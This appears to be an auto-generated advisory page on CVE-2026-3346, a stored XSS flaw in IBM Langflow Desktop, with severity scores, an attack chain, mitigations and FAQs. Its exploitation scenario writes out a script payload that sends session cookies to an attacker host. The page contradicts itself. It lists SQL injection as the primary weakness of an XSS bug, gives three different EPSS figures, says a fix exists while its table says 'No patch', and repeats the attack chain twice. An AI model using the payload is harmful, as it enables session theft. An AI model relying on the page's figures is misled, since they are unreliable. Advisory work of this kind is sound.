CVE-2026-3346: Langflow stored XSS enables

CISO Take

IBM Langflow Desktop versions 1.6.0–1.8.4 contain a stored XSS vulnerability that allows any authenticated user to inject arbitrary JavaScript into the web UI, persisting across sessions and executing in the context of other users' trusted sessions. The blast radius extends to any credentials, API keys, or session tokens visible within the Langflow interface — in AI deployments this typically means LLM API keys (OpenAI, Anthropic, etc.) and pipeline secrets. Although the absolute EPSS score is low (0.00029), it ranks in the top 92nd percentile of CVEs by exploitation likelihood, and the low-complexity, network-accessible attack vector with no user interaction requirement (CVSS AC:L/UI:N/S:C) lowers the bar significantly for lateral movement within AI infrastructure. Immediately upgrade to a version beyond 1.8.4 per IBM advisory (ibm.com/support/pages/node/7271095); if patching is delayed, restrict Langflow UI access to trusted internal networks and audit stored flow configurations for unexpected script content.

Sources: NVD EPSS ATLAS ibm.com

What is the risk?

Medium severity with elevated exploitation concern for AI-specific deployments. The CVSS 6.4 score understates operational risk in AI pipeline contexts where the Langflow UI stores LLM provider API keys and workflow secrets. Requires only low-privilege authenticated access with network reachability — achievable via any trial/shared account or compromised developer credential. Scope change (S:C) indicates impact crosses trust boundaries. SSVC decision of TRACK is appropriate for general environments, but organizations using Langflow to orchestrate production AI workflows should treat this as higher priority given credential theft potential.

How does the attack unfold?

Initial Access

Authenticated low-privilege attacker gains access to Langflow web UI using a valid developer or trial account.

AML.T0012

Payload Injection

Attacker embeds malicious JavaScript in a persistent UI field (flow name, description, or node label) that is stored in the application database.

AML.T0049

Credential Harvesting

When a privileged user opens the affected page, the stored XSS payload executes silently in their authenticated session, harvesting LLM API keys, session cookies, and visible secrets.

AML.T0083

Exfiltration & Pivot

Stolen credentials are beaconed to an attacker-controlled server; the attacker reuses API keys to access LLM providers or connected downstream systems outside the victim environment.

AML.T0025

Initial Access

Authenticated low-privilege attacker gains access to Langflow web UI using a valid developer or trial account.

AML.T0012

Payload Injection

Attacker embeds malicious JavaScript in a persistent UI field (flow name, description, or node label) that is stored in the application database.

AML.T0049

Credential Harvesting

When a privileged user opens the affected page, the stored XSS payload executes silently in their authenticated session, harvesting LLM API keys, session cookies, and visible secrets.

AML.T0083

Exfiltration & Pivot

Stolen credentials are beaconed to an attacker-controlled server; the attacker reuses API keys to access LLM providers or connected downstream systems outside the victim environment.

AML.T0025

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Langflow	pip	—	No patch
149.9K Pushed 3d ago 40% patched ~67d to patch Full package profile →

Do you use Langflow? You're affected.

How severe is it?

CVSS 3.1

6.4 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 5% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Changed

C Low

I Low

A None

What should I do?

5 steps

Patch: Upgrade IBM Langflow Desktop to the latest version beyond 1.8.4 per IBM advisory at ibm.com/support/pages/node/7271095.
Network isolation: If immediate patching is not possible, restrict Langflow web UI to localhost or VPN-only access to prevent multi-user exposure.
Credential rotation: Audit and rotate all LLM provider API keys and integration secrets stored within Langflow flow configurations.
Detection: Review Langflow flow definitions and node configurations for unexpected <script> tags or obfuscated JavaScript in string fields. Enable Content-Security-Policy headers if running self-hosted.
Access control: Enforce least-privilege on Langflow user accounts; limit who can create or edit flows in shared environments.

What does CISA's SSVC say?

Decision Track

Exploitation none

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Data Extraction Auth Bypass Framework AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0055 - Unsecured Credentials AML.T0083 - Credentials from AI Agent Configuration

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.5 - Protection of AI system resources

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain the value of AI systems over time

OWASP LLM Top 10

LLM02:2025 - Sensitive Information Disclosure LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-3346?

IBM Langflow Desktop versions 1.6.0–1.8.4 contain a stored XSS vulnerability that allows any authenticated user to inject arbitrary JavaScript into the web UI, persisting across sessions and executing in the context of other users' trusted sessions. The blast radius extends to any credentials, API keys, or session tokens visible within the Langflow interface — in AI deployments this typically means LLM API keys (OpenAI, Anthropic, etc.) and pipeline secrets. Although the absolute EPSS score is low (0.00029), it ranks in the top 92nd percentile of CVEs by exploitation likelihood, and the low-complexity, network-accessible attack vector with no user interaction requirement (CVSS AC:L/UI:N/S:C) lowers the bar significantly for lateral movement within AI infrastructure. Immediately upgrade to a version beyond 1.8.4 per IBM advisory (ibm.com/support/pages/node/7271095); if patching is delayed, restrict Langflow UI access to trusted internal networks and audit stored flow configurations for unexpected script content.

Is CVE-2026-3346 actively exploited?

No confirmed active exploitation of CVE-2026-3346 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-3346?

1. Patch: Upgrade IBM Langflow Desktop to the latest version beyond 1.8.4 per IBM advisory at ibm.com/support/pages/node/7271095. 2. Network isolation: If immediate patching is not possible, restrict Langflow web UI to localhost or VPN-only access to prevent multi-user exposure. 3. Credential rotation: Audit and rotate all LLM provider API keys and integration secrets stored within Langflow flow configurations. 4. Detection: Review Langflow flow definitions and node configurations for unexpected <script> tags or obfuscated JavaScript in string fields. Enable Content-Security-Policy headers if running self-hosted. 5. Access control: Enforce least-privilege on Langflow user accounts; limit who can create or edit flows in shared environments.

What systems are affected by CVE-2026-3346?

This vulnerability affects the following AI/ML architecture patterns: LLM application development platforms, Agent frameworks, Workflow automation pipelines, Multi-user AI development environments.

What is the CVSS score for CVE-2026-3346?

CVE-2026-3346 has a CVSS v3.1 base score of 6.4 (MEDIUM). The EPSS exploitation probability is 0.16%.

What is the AI security impact?

Affected AI Architectures

LLM application development platformsAgent frameworksWorkflow automation pipelinesMulti-user AI development environments

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means

AML.T0049 Exploit Public-Facing Application

AML.T0055 Unsecured Credentials

AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2.5

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM02:2025, LLM05:2025

What are the technical details?

Original Advisory

IBM Langflow Desktop 1.6.0 through 1.8.4 Lanflow is vulnerable to stored cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

Exploitation Scenario

An attacker with low-privilege Langflow access (e.g., a developer account in a shared AI team environment) names a flow or embeds JavaScript in a flow description field: <script>fetch('https://attacker.com/collect?c='+document.cookie)</script>. When a Langflow administrator or colleague opens the flows dashboard, the stored payload executes in their authenticated browser session, silently exfiltrating their session token and any LLM API keys rendered on the page. The attacker then uses those credentials to access the victim's OpenAI or Anthropic account, enumerate deployed models, or pivot into connected data sources via Langflow's integration nodes — all without triggering alerts since they operate under a legitimate API key.

Weaknesses (CWE)

CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Primary

CWE-89 — Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'): The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly.
[Architecture and Design] If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]

Source: MITRE CWE corpus.